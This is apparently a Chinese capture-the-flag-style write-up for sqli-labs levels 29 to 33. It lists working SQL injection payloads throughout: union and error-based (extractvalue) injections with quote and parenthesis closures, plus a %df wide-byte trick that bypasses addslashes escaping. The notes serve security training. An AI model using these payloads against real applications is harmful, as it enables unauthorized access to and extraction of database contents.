sqllab第29-33通关笔记

29关知识点：

• 单引号闭合绕过
• 联合注入
  • payload:id=0%27union+select+1,2,database()%271
• 报错注入
  • id=1%27and+extractvalue(1,concat(0x7e,database(),0x7e))=%271
• 下面就不演示了，上面给出了payload，感觉没有任何过滤信息，那个waf应该是唬人的

30关知识点：

• 双引号闭合绕过
• 联合注入
  • payload:id=0"union+select+1,database(),version()%20"
• 这里不能使用错误注入，没有回显信息

31关知识点：

• 原始语句
  • where id=("输入")
• 报错注入
  • 双引号闭合
    • paylaod:id=1"+and+extractvalue(1,concat(0x7e,database(),0x7e))="1
  • 双引号+括号闭合
    • payload:id=1")+and+extractvalue(1,concat(0x7e,database(),0x7e))=("1
• 联合注入
  • payload:id=0")%20union%20select%201,database(),3%20and+1=("1

32关知识点：

• 单引号闭合+注释绕过
• 宽字节注入+错误注入
  • 利用%df吞掉\  GBK模式采用两个字符表示一个中文字符
  • payload:id=1%df%27%20and%20extractvalue(1,concat(0x7e,database(),0x7e))=0--+
• 宽字节注入+联合注入
  • payload:id=0%df%27%20union%20select%201,database(),version()--+
• 对单引号、双引号、\ 进行了过滤

33关知识点：

• 和32关一模一样
• 过滤条件使用了addslashes()函数
  • 效果就是把单引号、双引号、\、null进行转义了
  • 和32关手写注释条件效果一样
• 具体payload就不写了，直接用32关的就好

10